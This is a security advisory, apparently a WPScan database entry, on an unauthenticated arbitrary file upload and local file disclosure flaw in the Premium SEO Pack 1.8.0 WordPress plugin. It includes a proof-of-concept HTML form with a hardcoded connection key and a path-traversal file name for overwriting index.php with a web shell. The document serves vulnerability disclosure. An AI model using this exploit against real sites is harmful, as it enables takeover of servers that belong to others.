Premium SEO Pack 1.8.0 - Unauthenicated Arbitrary File Upload & LFD



Description
This plugin is vulnerable to Local File Disclosure and Remote Code Execute via Arbitrary File Upload. 
Proof of Concept
<form action="http://www.example.com/wp-content/plugins/premium-seo-pack/modules/remote_support/remote_tunnel.php" method="post" >
	<input type="hidden" name="connection_key" value="69efc4922575861f31125878597e97cf" >
	<input name="action" value="save_file" ><br>
	<input name="file" value="../../../index.php"><br>
	<textarea name="file_content" >BASE64 ENCODED SHELL</textarea><br>
	<input type="submit" ><br>
</form>

Affects Plugin

References

PACKETSTORM 131621
URL http://web.archive.org/web/20150914160857/http://research.evex.pw/?vuln=12
URL http://codecanyon.net/item/premium-seo-pack-wordpress-plugin/6109437

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Submitter A. Samman
Submitter Twitter Evex_1337
Views 1241
Verified No
WPVDB ID 7934

Timeline

Publicly Published 2015-04-24 (over 3 years ago)
Added 2015-04-24 (over 3 years ago)
Last Updated 2016-04-24 (over 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.